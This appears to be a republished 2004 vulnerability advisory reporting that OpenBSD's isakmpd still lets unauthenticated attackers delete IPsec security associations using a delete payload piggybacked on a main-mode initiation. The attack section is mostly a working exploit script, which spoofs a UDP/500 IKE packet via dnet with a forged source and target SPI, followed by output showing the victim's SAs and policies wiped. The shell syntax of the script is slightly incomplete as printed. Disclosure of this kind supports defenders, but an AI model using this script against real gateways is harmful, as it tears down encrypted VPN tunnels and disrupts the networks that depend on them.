unauthorized deletion of IPsec SAs in isakmpd, still

Type securityvulns
Reporter Securityvulns
Modified 2004-06-09T00:00:00


1 Abstract

For nearly 10 months a handful of OpenBSD-developers is trying to fix a plethora of payload handling flaws in isakmpd. On 2004/01/13 they released something like a final patch to a broader public. The patch protects against some specific attacks, but does not solve the problem.

2 Description

Unauthorized deletion of IPsec SAs is still possible using a delete payload piggybacked on a initiation of main mode.

For more details trace message_recv() ff. with gdb during an attack.

3 Affected Systems

All (recent) versions of isakmpd are affected. The attack has been successfully tested against the most recent CVS-version of isakmpd.

4 The Attack

Here we go. There is an IPsec tunnel between sg-a and sg-b:

sg-a# cat /kern/ipsec | grep SPI
SPI = 97e49ca2, Destination = <sg-a's IP address>, Sproto = 50
SPI = 901e38d9, Destination = <sg-b's IP address>, Sproto = 50

The attacker built some little script, because this time he wants to shoot down a bunch of IPsec SAs:

attacker# cat during_these_hostile_and_trying_times_and_what-not
if [ ! $# -eq 3 ]; then
  echo "usage: $0 <faked-src> <victim> <spi>";

src=$1; dst=$2
spi=`echo $3 | sed 's/\(..\)/\\\\x\1/g'`
cky_i=`dd if=/dev/urandom bs=8 count=1 2>/dev/null`

dnet hex \
  $cky_i \
  "\x00\x00\x00\x00\x00\x00\x00\x00" \
  "\x01\x10\x02\x00" \
  "\x00\x00\x00\x00" \
  "\x00\x00\x00\x58" \
    "\x0c\x00\x00\x2c" \
    "\x00\x00\x00\x01" \
    "\x00\x00\x00\x01" \
      "\x00\x00\x00\x20" \
      "\x01\x01\x00\x01" \
      "\x00\x00\x00\x18" \
      "\x00\x01\x00\x00" \
      "\x80\x01\x00\x05" \
      "\x80\x02\x00\x02" \
      "\x80\x03\x00\x01" \
      "\x80\x04\x00\x02" \
    "\x00\x00\x00\x10" \
    "\x00\x00\x00\x01" \
    "\x03\x04\x00\x01" \
    $spi |
dnet udp sport 500 dport 500 |
dnet ip proto udp src $src dst $dst |
dnet send

He fires up his script with appropriate parameters:

attacker# ./during_these_hostile_and_trying_times_and_what-not \
> sg-b sg-a 901e38d9

And the victim's IPsec SAs and policies fade away almost instantaneous:

sg-a# cat /kern/ipsec  
Hashmask: 31, policy entries: 0

5 Solution?

There are no bug fixes, yet.

Thomas Walpuski